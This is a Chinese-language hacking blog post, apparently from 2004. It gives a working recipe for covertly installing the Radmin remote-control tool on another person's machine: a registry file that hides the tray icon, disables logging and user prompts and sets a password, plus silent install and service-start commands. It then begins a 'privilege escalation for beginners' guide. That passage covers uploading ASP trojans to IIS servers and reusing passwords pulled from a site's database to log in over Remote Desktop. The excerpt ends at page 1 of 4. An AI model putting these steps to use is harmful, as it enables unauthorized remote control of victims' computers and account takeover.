我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了， 它的缺点太多，例如要依赖IPC＄，日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台，但缺点是隐藏图标的问题，我不会编程，当然无法去除图标，还有就是 VNC 功能很少。radmin 就不同了，它的特色有：速度快隐藏图标，COPY文件，telnet 等功能。安装也及其简单：
　　首先要在自己修改注册表............

　　HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 起名为radmin.reg 　

　　内容大概如下：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]

　　"Port"=hex:64,19,00,00

　　"Timeout"=hex:0a,00,00,00

　　"EnableLogFile"=hex:00,00,00,00

　　"LogFilePath"="c:\\logfile.txt"

　　"FilterIp"=hex:00,00,00,00

　　"DisableTrayIcon"=hex:01,00,00,00

　　"AutoAllow"=hex:00,00,00,00

　　"AskUser"=hex:00,00,00,00

　　"EnableEventLog"=hex:00,00,00,00

　　"NTAuthEnabled"=hex:00,00,00,00

　　"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b

　　解释一下 "DisableTrayIcon"=hex:01,00,00,00 里的01表示隐藏图标，改成00，图标就会显示 。"Port"=hex:当然是端口，这里是6500。 "Parameter"=hex:是密码。

　　其他的就不用管了。

　　现在我们将

　　AdmDll.dll

　　raddrv.dll

　　r_server.exe

　　radmin.reg

　　复制到对方的c:\winnt\system32下。

　　然后在对方机器上运行：

　　regedit /s radmin.reg

　　r_server /install /silence

　　net start r_server
　　马上连接即可，速度还不错。并且它还自带了ftp和telnet，在实际中有很大用处。

http://653.mblogger.cn/posts/13024.aspx Mon, 02 Aug 2004 23:21:00 GMT http://653.mblogger.cn/posts/13024.aspx http://computer.mblogger.cn/653/comments/13024.aspx http://653.mblogger.cn/posts/13024.aspx #feedback 0 http://computer.mblogger.cn/653/comments/commentRss/13024.aspx http://computer.mblogger.cn/653/trackback.aspx?ID=13024

　　现在的入侵是越来越难了，人们的安全意识都普遍提高了不少，连个人用户都懂得防火墙，杀毒软件要装备在手，对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。（这可是一件大大的好事啊。）

　　但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段，我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击，只能获得IUSR-MACHINENAME的权限（如上传asp木马，以及某些溢出等）。这个帐号通常可是系统默认的guest权限，于是，如何拿到系统管理员或者是system权限，便显得日益重要了。

　　于是，我就总结了一下大家所经常使用的几种提升权限的方法，以下内容是我整理的，没有什么新的方法，写给和我一样的菜鸟看的。高手们就可以略去了，当然，你要复习我不反对，顺便帮我查查有什么补充与修改：

　　1、社会工程学。

　　对于社会工程学，我想大家一定不会陌生吧？（如果你还不太明白这个名词的话，建议你去找一些相关资料查查看。）我们通常是通过各种办法获得目标的敏感信息，然后加以分析，从而可以推断出对方admin的密码。举一个例子：假如我们是通过对服务器进行数据库猜解从而得到admin在网站上的密码，然后借此上传了一个海洋顶端木马，你会怎么做？先翻箱倒柜察看asp文件的代码以希望察看到连接SQL的帐号密码？错错错，我们应该先键入一个netstat –an命令察看他开的端口（当然用net start命令察看服务也行）。一旦发现他开了3389，犹豫什么？马上拿出你的终端连接器，添上对方IP，键入你在他网站上所获得的用户名及密码……几秒之后，呵呵，进去了吧？这是因为根据社会工程学的原理，通常人们为了记忆方便，将自己在多处的用户名与密码都是用同样的。于是，我们获得了他在网站上的管理员密码，也就等同于获得了他所有的密码。其中就包括系统admin密码。于是我们就可以借此登入他的3389拉！

本新闻共4页,当前在第1页  1  2  3  4